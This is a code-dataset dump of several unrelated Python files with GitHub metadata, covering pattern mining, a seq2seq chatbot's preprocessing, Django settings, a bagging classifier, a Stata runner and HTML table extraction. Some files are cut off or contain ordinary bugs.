blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9d82cd9f0f653d64354eb86703a1e008bb78b661 | 43cb7845e503bd475b79125c842b6b3fcffaca6d | /lamp_ep.py | 7d9f1353ce853e5cabff5d09aa5bf8f0ccf60049 | [] | no_license | KAZYPinkSaurus/lamp-ep | 7d1799a7e6eaa3565ba15d23e4cd3a0e56ebccab | 47da33f1aaa8d4b63ce1d7b2d4948bf0583aa93d | refs/heads/master | 2021-09-15T01:35:10.251418 | 2018-05-23T13:48:51 | 2018-05-23T13:48:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | import math
import pandas as pd
import numpy as np
class Lamp_ep():
    """LAMP-style significant-pattern mining with a Tarone/Bonferroni-corrected
    multiple-testing procedure (emerging-pattern variant).

    The dataset holds one row per candidate pattern with its support counts;
    extract() picks the smallest admissible support threshold tau and returns
    every testable pattern together with its corrected p-value.
    """
    def __init__(self,aA=0.7,aQ=0.05,aMax_min_sup=100,aDataset=pd.DataFrame()):
        """
        a in (0,1)
        Parameters
        -------
        aA : float
            Effect-size threshold; must lie strictly inside (0, 1).
        aQ : float
            Target family-wise significance level (e.g. 0.05).
        aMax_min_sup : int
            Upper bound for the minimum-support threshold search.
        aDataset : DataFrame
            Must carry the columns ['pattern', 'Nep', 'Ne'].
            NOTE(review): a mutable default DataFrame is shared across
            calls -- callers should always pass their own dataset.
        """
        if(aA >= 1 or aA <= 0):
            print("Error:a=!(0~1)")
            exit()
        self.mA = aA
        self.mMax_min_sup = aMax_min_sup
        self.mQ = aQ
        self.mDataset = aDataset
    def __get_min_tau(self):
        """Return the smallest tau whose Tarone bound mA**tau does not exceed
        the Bonferroni level mQ / |eps_alg(tau)|.

        NOTE(review): if mining_eps_alg(i) ever returns an empty frame the
        division below raises ZeroDivisionError -- confirm the dataset always
        contains testable patterns for every i in the search range.
        """
        for i in range(1,self.mMax_min_sup):
            print("i="+str(i)+" "+str(self.mA**i)+"<="+str(self.mQ/len(self.mining_eps_alg(i).index)))
            if self.mA**i <= self.mQ/len(self.mining_eps_alg(i).index):
                return i
        print("τが得られなかった")  # no admissible tau was found
        exit()
    def __get_corrected_pvs(self, aTau):
        """Mine patterns at the chosen tau, apply the multiple-testing
        correction to all of them, and return patterns with their p-values."""
        # Obtain eps_alg, the set of testable patterns at threshold aTau.
        tEps_alg = self.mining_eps_alg(aTau)
        tEps_alg_size = len(tEps_alg.index)
        # Bonferroni correction at level q / |eps_alg|: each raw p-value is
        # scaled by the number of tests instead of shrinking the threshold.
        tPes = []
        for i in tEps_alg.index:
            tPes.append(tEps_alg_size*self.__pe(tEps_alg['Nep'][i],tEps_alg['Ne'][i]))
        tPv = pd.DataFrame(tPes,index=tEps_alg.index,columns=['p-value'])
        return pd.concat([tEps_alg,tPv],axis=1)
    def extract(self):
        """
        Mining and Multiple testing
        Returns
        -------
        tPtn_Pv : DataFrame
            pattern and P-value
        """
        print("Step1,2を行う(Tarone的手順)")  # steps 1-2: Tarone-style procedure
        tTau = self.__get_min_tau()
        print("selcted tau:"+str(tTau))
        tPtn_Pv = self.__get_corrected_pvs(tTau)
        return tPtn_Pv
    def __kl(self,aP,aQ):
        """
        Binary KL divergence KL(aP || aQ) between Bernoulli parameters.
        """
        return aP*math.log(aP/aQ)+(1-aP)*math.log((1-aP)/(1-aQ))
    def __pe(self,aNep,aNe):
        """
        approximate P-value: a Chernoff-style bound exp(-Ne * KL(mu, a));
        returns 1 when the observed ratio does not exceed the threshold a.
        """
        tMue=aNep/aNe
        if tMue > self.mA:
            return math.exp(-aNe*self.__kl(tMue,self.mA))
        else:
            return 1
    ##### Temporary: move to a separate file later (test-data helper for now).
    # Return the transactions whose Ne is at least aMin_sup.
    def mining_eps_alg(self, aMin_sup):
        return self.mDataset[self.mDataset['Ne']>= aMin_sup]
| [
"nishi@Nishis-MacBook.local"
] | nishi@Nishis-MacBook.local |
1070cd8566457d889b1f144ee8456b63946d6861 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/40/usersdata/81/18116/submittedfiles/funcoes.py | 54b96934c77ea74865637ac40054305beadee568 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | #ARQUIVO COM SUAS FUNCOES
def cos(e,fat):
    """Apparently meant to approximate a cosine via an alternating series
    with *fat* as a factorial denominator -- TODO confirm intended formula.

    NOTE(review): as written this function is inert: ``soma`` starts at 0,
    so ``0 < soma`` is False on the first test, the loop body never runs,
    and the function falls through returning None. The intended update rule
    (and a return statement) must be recovered from the original assignment
    before this can be fixed; no behavior change is made here.
    """
    soma=0
    while 0<soma<=e:  # never True with soma == 0 -- loop body is dead code
        for j in range(1,e,1):
            for i in range(2,e,2):
                soma=soma+(((e**i)/fat)+((-1)**j))
def razao(pi, cos):
    """Return the golden ratio, computed as 2*cos(pi/5).

    Parameters
    ----------
    pi : float
        The constant pi (e.g. ``math.pi``).
    cos : callable
        A cosine function (e.g. ``math.cos``).

    BUG FIX: the original line ``aurea=2*cos.(pi/5)`` was a syntax error
    (stray dot after ``cos``); ``cos`` is the function parameter here and
    must simply be called.
    """
    aurea = 2 * cos(pi / 5)
    return aurea
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
eec2105832578fcd5e5ac327826762df397aeb18 | bb87cbbe27968a91f4dade7e153cea0d5759a29f | /chatbot.py | e188e8492c12ef375244c8143bc57b7f865ff037 | [] | no_license | diksha096/Hacktoberfest | 976f123d681e78907d980c176a704a8be4527185 | a39a8f2a11db664480116d9433864cab0916c52b | refs/heads/master | 2020-04-02T20:04:59.043696 | 2018-10-27T19:10:50 | 2018-10-27T19:10:50 | 154,757,420 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,942 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 16 00:55:19 2018
@author: dikshasharma
"""
import tensorflow as tf
import re
import time
import numpy as np
lines=open('movie_lines.txt',encoding='utf-8',errors='ignore').read().split('\n')
conversations=open('movie_conversations.txt',encoding='utf-8',errors='ignore').read().split('\n')
#create a dictionary to map lines with their ids
idline={}
for line in lines:
line=line.split(' +++$+++ ')
if len(line)==5:
idline[line[0]]=line[4]
#create a list of all the conversation ids
conversation_ids=[]
for conversation in conversations[:-1]:
conversation=conversation.split(' +++$+++ ')[-1][1:-1].replace("'","").replace(" ","")
conversation_ids.append(conversation.split(','))
#create a list for questions and answers
questions=[]
answers=[]
for conversation in conversation_ids:
for i in range(len(conversation)-1):
questions.append(idline[conversation[i]])
answers.append(idline[conversation[i+1]])
def clean_text(text):
    """Lower-case *text*, expand common English contractions, and replace
    punctuation/special characters with spaces.

    The substitutions are applied in a fixed order, matching the original
    pipeline exactly (earlier contractions can fire inside later ones).
    """
    substitutions = (
        (r"i'm", " i am"),
        (r"he's", " he is"),
        (r"she's", " she is"),
        (r"that's", " that is"),
        (r"what's", " what is"),
        (r"where's", " where is"),
        (r"\'ll", " will"),
        (r"\'ve", " have"),
        (r"\'re", " are"),
        (r"\'d", " would"),
        (r"[- #@;() / <> + = {} ~ | ? .]", " "),
    )
    cleaned = text.lower()
    for pattern, replacement in substitutions:
        cleaned = re.sub(pattern, replacement, cleaned)
    return cleaned
#clean questions
clean_questions=[]
for question in questions:
clean_questions.append(clean_text(question))
#clean answers
clean_answers=[]
for answer in answers:
clean_answers.append(clean_text(answer))
wordcount={}
for question in clean_questions:
for word in question.split():
if word not in wordcount:
wordcount[word]=1
else:
wordcount[word]+=1
for answer in clean_answers:
for word in answer.split():
if word not in wordcount:
wordcount[word]=1
else:
wordcount[word]+=1
threshold=20
questionword2int={}
word_number=0
for word,count in wordcount.items():
if count>=threshold:
questionword2int[word]=word_number
word_number+=1
answerword2int={}
word_number=0
for word,count in wordcount.items():
if count>=threshold:
answerword2int[word]=word_number
word_number+=1
tokens=['<PAD>','<EOS>','<OUT>','<SOS>']
for token in tokens:
questionword2int[token]=len(questionword2int)+1
for token in tokens:
answerword2int[token]=len(answerword2int)+1
answerint2word={w_i:w for w,w_i in answerword2int.items()}
#Adding end of string token at the end of every answer
for i in range(0,len(clean_answers)):
clean_answers[i]+=' <EOS>'
questions_to_int=[]
for question in clean_questions:
ints=[]
for word in question.split():
if word not in questionword2int:
ints.append(questionword2int['<OUT>'])
else:
ints.append(questionword2int[word])
questions_to_int.append(ints)
answers_to_int=[]
for answer in clean_answers:
ints=[]
for word in answer.split():
if word not in answerword2int:
ints.append(answerword2int['<OUT>'])
else:
ints.append(answerword2int[word])
answers_to_int.append(ints)
sorted_clean_questions=[]
sorted_clean_answers=[]
for length in range(1,25+1):
for i in enumerate(questions_to_int):
if len(i[1])==length:
sorted_clean_questions.append(questions_to_int[i[0]])
sorted_clean_answers.append(answers_to_int[i[0]])
#STEP2 SEQ2SEQ MODEL
def model_inputs():
    """Create the TF1 graph placeholders for the seq2seq model.

    Returns
    -------
    inputs : int32 placeholder, shape [batch, time] -- encoder token ids
    targets : int32 placeholder, shape [batch, time] -- decoder token ids
    lr : float32 scalar placeholder -- learning rate
    keep_prob : float32 scalar placeholder -- dropout keep probability

    BUG FIX: the shapes were given as the *strings* ['None', 'None'] instead
    of [None, None], and the names 'learning rate' / 'keep prob' contained
    spaces, which tf.placeholder rejects as invalid op names.
    """
    inputs = tf.placeholder(tf.int32, [None, None], name='input')
    targets = tf.placeholder(tf.int32, [None, None], name='target')
    lr = tf.placeholder(tf.float32, name='learning_rate')
    keep_prob = tf.placeholder(tf.float32, name='keep_prob')
    return inputs, targets, lr, keep_prob
def prepprocess_targets(targets, word2int, batch_size):
    """Prepend the <SOS> token id to every target sequence and drop each
    sequence's final token, producing the decoder's shifted inputs."""
    # Column of <SOS> ids, one per batch row.
    sos_column = tf.fill([batch_size, 1], word2int['<SOS>'])
    # All target tokens except the last one of every row.
    shifted_targets = tf.strided_slice(targets, [0, 0], [batch_size, -1], [1, 1])
    return tf.concat([sos_column, shifted_targets], 1)
def encoder_rnn_layer(rnn_inputs, rnn_size, num_layers, keep_prob, sequence_length):
    """Build the stacked bidirectional LSTM encoder and return its final state.

    Parameters
    ----------
    rnn_inputs : float tensor of inputs, presumably [batch, time, emb] --
        TODO confirm embedding happens upstream.
    rnn_size : int -- units per LSTM cell.
    num_layers : int -- depth of the stacked cell.
    keep_prob : float/placeholder -- dropout keep probability on cell inputs.
    sequence_length : int tensor [batch] -- true length of each sequence.

    BUG FIX: the original passed ``dtype=int32`` -- a bare, undefined name
    that raises NameError at call time; the RNN state dtype must be
    ``tf.float32``.
    """
    lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)
    lstm_dropout = tf.contrib.rnn.DropoutWrapper(lstm, input_keep_prob=keep_prob)
    encoder_cell = tf.contrib.rnn.MultiRNNCell([lstm_dropout] * num_layers)
    _, encoder_state = tf.nn.bidirectional_dynamic_rnn(cell_fw=encoder_cell,
                                                       cell_bw=encoder_cell,
                                                       sequence_length=sequence_length,
                                                       inputs=rnn_inputs,
                                                       dtype=tf.float32)
    return encoder_state
#decoding the training set
def decode_training_set(encoder_state,decoder_cell,):
| [
"noreply@github.com"
] | diksha096.noreply@github.com |
6481ee12912b8fdd44b93e6877122c399e386851 | b38e2fada052a3516522e708a53abe5b6393eb3f | /mysite/settings.py | f0bfda05a3b258407ff400b011fc89198e29fd99 | [] | no_license | EkaterinaIvanovaa/my_django_sit | d65d4f013f1839882230fd755a98ae47fa91b22e | cc9f489a8daf0666007ff8d0f9fec4d9addc6814 | refs/heads/master | 2022-07-02T23:09:45.767199 | 2020-05-17T15:07:13 | 2020-05-17T15:07:13 | 264,697,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,214 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control -- rotate it and
# load it from an environment variable before any production deployment.
SECRET_KEY = 'z_pp*2@2r4&&4)zttpc1ys%))-a2_*&@*pyhl9^ee(vpeb$q@#'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty is acceptable only while DEBUG is True; production must list the
# host/domain names this site serves.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'template')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'ru'
TIME_ZONE = 'Asia/Yekaterinburg'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media') | [
"katyuha-2011@yandex.ru"
] | katyuha-2011@yandex.ru |
44c09e443e221fdc991fc6f234d4d767cea183ad | 72daf73c49769980f19c6c290d5021bfef6bcbf1 | /bagging.py | 2f13770fe338b8c571a174f7de758525740ce43b | [] | no_license | MarschildX/IncomePredict | a42279a593ef954c3eb207775b4ddb40b2ef1a6d | c806e5561f95a69ffa446a5b14f291c90766009c | refs/heads/master | 2023-01-22T14:42:39.185187 | 2020-11-28T16:55:32 | 2020-11-28T16:55:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,260 | py | import numpy as np
import pandas as pd
from sklearn.ensemble import BaggingClassifier
from sklearn import metrics
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
data_train = pd.read_csv('./processed_data/train_5.csv')
test = pd.read_csv('./processed_data/test_5.csv')
# normalize
data_train_y = data_train.iloc[:, -1]
data_train.drop(columns=['exceeds50K'], inplace=True)
data_all = pd.concat([data_train, test], axis=0)
data_all = (data_all-data_all.mean()) / data_all.std()
data_train = data_all[0:data_train_y.shape[0]]
test = data_all[data_train_y.shape[0]:]
data_train = pd.concat([data_train, data_train_y], axis=1)
train = data_train.sample(frac=0.75, random_state=0, axis=0)
validate = data_train[~data_train.index.isin(train.index)]
train = np.array(train)
validate = np.array(validate)
test = np.array(test)
x_train = train[:, 0:-1]
y_train = train[:, -1]
x_validate = validate[:, 0:-1]
y_validate = validate[:, -1]
clf = BaggingClassifier(base_estimator=MLPClassifier(hidden_layer_sizes=(20, 2), alpha=1e-5, random_state=1,
max_iter=1000), n_estimators=50, bootstrap=True)
clf.fit(x_train, y_train)
y_validate_pred = clf.predict(x_validate)
print('Accuracy score:', metrics.accuracy_score(y_validate, y_validate_pred))
# KNN model, train_1 Accuracy score: 0.8283374283374283
# KNN, train_2 Accuracy score: 0.8337428337428338
# KNN, train_3 Accuracy score: 0.8298116298116298
# KNN, train_4 Accuracy score: 0.8314496314496315
# KNN, train_5 Accuracy score: 0.8384930384930385
# MLP, train_5, Accuracy score: 0.8576576576576577
train_all = np.array(data_train)
x_train_all = train_all[:, 0:-1]
y_train_all = train_all[:, -1]
clf2 = BaggingClassifier(base_estimator=MLPClassifier(hidden_layer_sizes=(20, 2), alpha=1e-5, random_state=1,
max_iter=1000), n_estimators=50, bootstrap=True)
clf2.fit(x_train_all, y_train_all)
test_pred = np.int_(clf2.predict(test))
print(test_pred)
idx = np.arange(len(test_pred))+1
result = np.vstack([idx, test_pred]).T
df_result = pd.DataFrame(data=result, columns=['id', 'prediction'])
df_result.to_csv('./result/bagging_res_process5.csv', index=None)
| [
"ai.xufang@qq.com"
] | ai.xufang@qq.com |
4916c7ffb221a17d73a7312b25205170ea38e80e | 404728244681a773f55be7f7b0c4933f439f3106 | /walis/service/cs/user.py | 280b7d3b8e645daa0b6ad2bf034f55f790409a92 | [] | no_license | limingjin10/walis | c4e22db27d964cefa068883edf979cabfedd74d6 | 198a4e94992c1790b7a9f2cd34b1686fefc87845 | refs/heads/master | 2021-05-29T04:50:34.091849 | 2015-06-15T14:19:23 | 2015-06-15T14:19:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | #!/usr/bin/env python2
# coding=utf8
from __future__ import absolute_import, division, print_function
from walis.service.rst import restaurant as rst_base
from walis.service.user import user as user_base
from walis.model.walis.cs import CSEvent
def get_user_by_phone(mobile):
    """Classify the owner of *mobile* and return a result dict.

    The dict always carries 'user_type'; when a restaurant matches it also
    carries 'restaurant_id'/'restaurant_name'/'phone', and when a user
    account matches it carries 'user_id'/'user_name'. A merchant match
    takes precedence; otherwise the user is labelled MARKETING when they
    belong to a director group, USER otherwise.
    """
    rst = rst_base.get_by_mobile(mobile)
    if rst:
        is_merchant = True
        result = {
            'user_type': CSEvent.USER_TYPE_MERCHANT,
            'restaurant_id': rst.id,
            'restaurant_name': rst.name,
            'phone': rst.phone,
        }
    else:
        is_merchant = False
        result = {'user_type': CSEvent.USER_TYPE_OTHERS}

    user = user_base.get_by_mobile(mobile)
    if not user:
        return result

    result['user_id'] = user.id
    result['user_name'] = user.username
    if is_merchant:
        return result

    director_groups = ['region_director', 'city_director', 'entry_director']
    if user_base.has_groups(user.id, director_groups):
        result['user_type'] = CSEvent.USER_TYPE_MARKETING
    else:
        result['user_type'] = CSEvent.USER_TYPE_USER
    return result
| [
"shaofeirong2006@126.com"
] | shaofeirong2006@126.com |
d23c134f5bcb7023e2df5e4f74ecc73a18ecd3e3 | 177a630e29faa05eed002a3be743f669f845168d | /STATAwithinPython/RunSTATAdoInPython.py | 4972fd30bb5025f93d3bc399e360a24b088b4d87 | [
"MIT"
] | permissive | babakrezaee/DataWrangling | 40156a0b31a340db8de9a75a0bc2514373f2c23e | dbc838dcae9bc6b7aeb9f3e1c0a16e67fbd90935 | refs/heads/master | 2021-05-03T09:10:49.859157 | 2019-07-27T14:35:18 | 2019-07-27T14:35:18 | 120,571,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | ## Set dofile address
## Set the path to your STATA .exe file, from the folder you installed STATA
## Do not forget that dofile and STATA should be in string
def dostata(dofile, STATA):
    """Run a Stata .do file in batch mode via the Stata executable.

    Parameters
    ----------
    dofile : str
        Path to the .do file to execute.
    STATA : str
        Path to the Stata executable.

    Returns
    -------
    int
        The subprocess exit status. (BUG FIX: the original discarded the
        return code, so callers could not detect a failed run.)
    """
    import subprocess
    cmd = [STATA, 'do', dofile]
    return subprocess.call(cmd)
| [
"noreply@github.com"
] | babakrezaee.noreply@github.com |
33f7d80dae4496675e4a3219399e55bbaade6bad | 25f2f36f7bd1e4af75681935780a625363e663fa | /文本及表格提取代码.py | 64cb3dd16ed0336aed899bd8e9d4508b319d6f61 | [] | no_license | jianxinjiao/Cnki | 78061dcc1c629e12a190eaf7276f8e8b63334d9c | e3a2265a8221d52ec6e8dd3df9ef96a8e2c7b281 | refs/heads/master | 2023-05-27T08:01:13.109180 | 2021-06-18T03:14:31 | 2021-06-18T03:14:31 | 378,003,975 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 9,782 | py | import os
import re
import base64
import pandas as pd
from bs4 import BeautifulSoup
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
    """HTML-to-text parser that records a flat event list (depth, kind, text)
    and joins it into plain text with newlines at block-level tag closes.

    NOTE(review): ``res_list`` and ``value`` are *class* attributes, so their
    state is shared across instances unless reset; callers (see get_text_str)
    assign fresh ``res_list``/``value`` on the instance before feed().
    """
    res_list = list()   # accumulated events: [depth, 'starttag'|'endtag'|'data', value]
    value = 0           # current nesting depth
    # Tags treated as block-level: closing one of these emits a newline.
    label_list = ['div', 'br', 'p', 'title', 'ul', 'li', 'table', 'tr', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7']
    def handle_starttag(self, tag, attrs):
        # <br> is recorded as a literal newline instead of a nesting level.
        if tag == 'br':
            self.res_list.append([self.value, 'data', '\n'])
        else:
            self.value += 1
            self.res_list.append([self.value, 'starttag', tag])
    def handle_endtag(self, tag):
        self.res_list.append([self.value, 'endtag', tag])
        self.value -= 1
    def handle_data(self, data):
        # Drop all ASCII spaces; keep the chunk only if something remains.
        data = data.replace(' ', '')
        if data:
            self.res_list.append([self.value, 'data', data])
    def get_join_str(self):
        """Join the recorded events into text; collapse consecutive
        block-level closes into a single newline; return '' when only
        whitespace was collected."""
        _res_str = str()
        _res = self.res_list  # local alias over the event list
        for i in range(len(_res)):
            # The first and last events (outermost wrapper) are skipped.
            if i == 0 or i == len(_res) - 1:
                continue
            tree_label = _res[i][1]
            tree_value = _res[i][2]
            if tree_label == 'endtag' and tree_value in self.label_list:
                # Only emit a newline when the previous event was not also
                # a block-level close (avoids runs of blank lines).
                if _res[i-1][1] == 'endtag' and _res[i-1][2] in self.label_list:
                    pass
                else:
                    _res_str += '\n'
            if tree_label == 'data':
                _res_str += tree_value
        if not _res_str.replace('\n', '').replace(' ', ''):
            _res_str = ''
        return _res_str
def remove_html_label(html_str: str):
    """Strip <script>, <style>, <iframe>, HTML comments and hidden <span>
    blocks from *html_str* (newlines are removed first so the non-greedy
    patterns match across original line breaks).

    BUG FIX: the original bound the <iframe> pattern to the same name as the
    <style> pattern (``re_style`` was assigned twice), so <style> blocks were
    never removed. The two patterns are now distinct and both applied.
    """
    re_script = re.compile('<script.*?</script>', re.I)
    re_style = re.compile('<style.*?</style>', re.I)
    re_iframe = re.compile('<iframe.*?</iframe>', re.I)
    re_notes = re.compile('<!--.*?-->', re.I)
    re_span = re.compile('<span style="display:none".*?</span>', re.I)
    # Flatten to one line so '.*?' can span what were multi-line blocks.
    html_str = html_str.replace('\n', '')
    new_html_str = re_script.sub('', html_str)
    new_html_str = re_style.sub('', new_html_str)
    new_html_str = re_iframe.sub('', new_html_str)
    new_html_str = re_notes.sub('', new_html_str)
    new_html_str = re_span.sub('', new_html_str)
    return new_html_str
def get_text_str(html_str: str):
    """Return the visible text of *html_str* with script/style/comment noise
    removed and block-level tag boundaries rendered as newlines."""
    cleaned = remove_html_label(html_str)
    parser = MyHTMLParser()
    # Reset the parser's (class-level) accumulator state before feeding.
    parser.res_list = []
    parser.value = 0
    parser.feed(cleaned)
    return parser.get_join_str()
def get_table_list(table_str: str):
soup = BeautifulSoup(table_str, 'lxml')
table_trs = soup.findAll('tr')
tr_val_list = list() # [*, *, ...]
for tr_i in range(len(table_trs)):
table_tds_ths = table_trs[tr_i].findAll(['td', 'th'])
# if len(table_tds_ths) == 0:
# continue
td_th_val_list = list()
for td_th_i in range(len(table_tds_ths)):
val = table_tds_ths[td_th_i].getText()
colspan = table_tds_ths[td_th_i].get('colspan')
rowspan = table_tds_ths[td_th_i].get('rowspan')
if rowspan:
try:
rowspan = int(rowspan)
except ValueError:
rowspan = 1
insert_val = [val, int(rowspan)]
else:
insert_val = [val, 1]
if colspan:
try:
colspan = int(colspan)
except ValueError:
colspan = 1
td_th_val_list += [insert_val] * int(colspan)
else:
td_th_val_list.append(insert_val)
if len(td_th_val_list) == 0:
return ''
if tr_i == 0:
tr_val_list.append(td_th_val_list)
else:
td_th_val_list.reverse()
res_td_th_list = list()
for i in tr_val_list[tr_i - 1]:
if i[1] > 1:
res_td_th_list.append([i[0], i[1] - 1])
else:
try:
td_th_val = td_th_val_list.pop()
except IndexError:
continue
res_td_th_list.append(td_th_val)
tr_val_list.append(res_td_th_list)
res_list = [[y[0] for y in x] for x in tr_val_list]
return res_list
def panduanFlag(table_val):
    """Return True if any cell in *table_val* holds real content, i.e.
    anything other than the blank placeholders '', NBSP, or ideographic
    space; False for an empty or all-blank row."""
    blanks = {'\xa0', '\u3000', ''}
    return any(cell not in blanks for cell in set(table_val))
def split_table(table_list):
flag_list = [0]
table_start = 0
table_end = 0
for i in range(len(table_list)):
if 1 not in flag_list and len(set(table_list[i])) != 1:
flag_list.append(1)
table_start = i
if len(set(table_list[i])) == 1 and 1 in flag_list:
table_end = i
break
if table_end == 0:
table_end = len(table_list)
text_start_list = table_list[:table_start] # [] / [[], []]
table = table_list[table_start: table_end] # [[], []]
text_end_list = table_list[table_end:] # [] / [[], []]
col_len = len(table[0])
fill_list = [''] * col_len
text_start_list = [x[0] for x in text_start_list if len(x) > 0 and x[0].replace(' ', '').replace('\n', '').replace('\xa0', '')]
if text_start_list:
text_start_list = text_start_list + [''] * (col_len - len(text_start_list))
else:
text_start_list = fill_list
table.insert(0, fill_list)
text_end_list = [x[0] for x in text_end_list if len(x) > 0 and x[0].replace(' ', '').replace('\n', '')]
if text_end_list:
text_end_list = [[x] + [''] * (col_len - 1) for x in text_end_list]
else:
text_end_list = fill_list
# res_list = [text_start_list] + table + [text_end_list]
res_list = [text_start_list] + table
return res_list
def handle_table_list(table_list: list):
table_list = [x for x in table_list if panduanFlag(x)]
if len(table_list) == 0:
return ''
if len(table_list[0]) == 1:
res = '。\n'.join(x[0] for x in table_list if len(x) != 0)
elif len(table_list[0]) == 2:
flag = False
for x in table_list:
a = x[-1].strip()
if len(a) > 0 and a[-1].isdigit():
flag = True
break
res = split_table(table_list) if flag else '。\n'.join([','.join(x) for x in table_list])
else:
res = split_table(table_list)
return res
def get_title_list(text_str: str):
    """Scan *text_str* bottom-up for a table title line.

    Lines starting with '单位' ("unit") are remembered and appended to the
    title as '&&<unit>'; spaces inside the title become '##' and the title
    is capped at 50 characters. Returns '' when no title line exists.
    """
    unit = ''
    for raw_line in reversed(text_str.split('\n')):
        line = raw_line.strip(' ').replace('\xa0', '').replace('\t', '').replace('\u3000', '')
        if not line:
            continue
        if line.startswith('单位'):
            unit = line
            continue
        title = line.replace(" ", "##")[:50]
        if unit:
            title = title + '&&' + unit
        return title
    return ''
def extract_txt_table(html_text):
html_str = remove_html_label(html_text)
soup = BeautifulSoup(html_str, 'lxml')
table_ys = soup.findAll('table')
if len(table_ys) == 0:
txt_str = get_text_str(html_str)
return txt_str, []
table_list = list()
for table in table_ys:
if len(re.findall('</table>', str(table), re.S)) == 1:
table_list.append(str(table))
soup_str = str(soup)
html_list = list()
for i in range(len(table_list)):
split_list = soup_str.split(table_list[i])
other_str = split_list[0]
soup_str = split_list[1]
if len(split_list) > 2:
soup_str = f'{table_list[i]}'.join(split_list[1:])
html_list += [get_text_str(other_str), get_table_list(table_list[i])]
if i == len(table_list)-1:
html_list.append(get_text_str(soup_str))
html_list = [x for x in html_list if x] # 去掉空值
html_list = [x if type(x) == str else handle_table_list(x) for x in html_list]
table_res = list()
for i in range(len(html_list)):
if i == 0:
if type(html_list[i]) == str:
type_flag = 0
else:
type_flag = 1
table_res.append(html_list[i])
continue
if type(html_list[i]) == str:
if type_flag == 0:
table_res[-1] = table_res[-1] + '\n' + html_list[i]
else:
table_res.append(html_list[i])
type_flag = 0
else:
table_res.append(html_list[i])
type_flag = 1
txt_list, table_list = [], []
for i in range(len(table_res)):
value = table_res[i]
if isinstance(value, list):
if len(value[0][0]) > 0:
